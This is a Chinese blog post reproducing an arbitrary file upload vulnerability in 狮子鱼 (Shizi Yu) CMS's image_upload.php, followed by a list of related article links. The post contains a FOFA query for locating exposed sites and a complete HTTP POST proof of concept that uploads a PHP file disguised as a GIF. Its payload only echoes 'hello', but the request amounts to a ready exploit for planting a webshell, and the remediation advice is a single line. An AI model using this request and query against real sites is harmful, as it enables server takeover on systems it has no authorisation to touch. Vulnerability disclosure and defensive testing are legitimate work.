【漏洞复现】狮子鱼CMS文件上传漏洞(image_upload.php)

Nx01 产品简介

狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

狮子鱼CMS image_upload.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

复制代码
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjGdyeoVHUBbniBlK

------WebKitFormBoundaryjGdyeoVHUBbniBlK
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php echo 'hello'?>
------WebKitFormBoundaryjGdyeoVHUBbniBlK--

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
2501_915373883 小时前
Redis线程安全深度解析:单线程模型的并发智慧
数据库·redis·安全
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十五期-URL重定向模块)
学习·安全·web安全·渗透测试·网络安全学习
Tipray20067 小时前
让敏感数据在流转与存储中始终守护在安全范围
安全
是小满满满满吗8 小时前
传输层:udp与tcp协议
linux·服务器·网络
前端页面仔8 小时前
易语言是什么?易语言能做什么?
开发语言·安全
小刘同学++8 小时前
ECB(电子密码本,Electronic Codebook) 和 CBC(密码分组链接,Cipher Block Chaining)区分于用途
网络·ssl
gadiaola8 小时前
【计算机网络】第3章:传输层—TCP 拥塞控制
网络·网络协议·tcp/ip·计算机网络
猎板PCB厚铜专家大族9 小时前
多层PCB技术解析:从材料选型到制造工艺的深度实践
网络·制造
FakeOccupational10 小时前
【碎碎念】宝可梦 Mesh GO : 基于MESH网络的口袋妖怪 宝可梦GO游戏自组网系统
网络·游戏
fei_sun12 小时前
【计算机网络】三报文握手建立TCP连接
网络·tcp/ip·计算机网络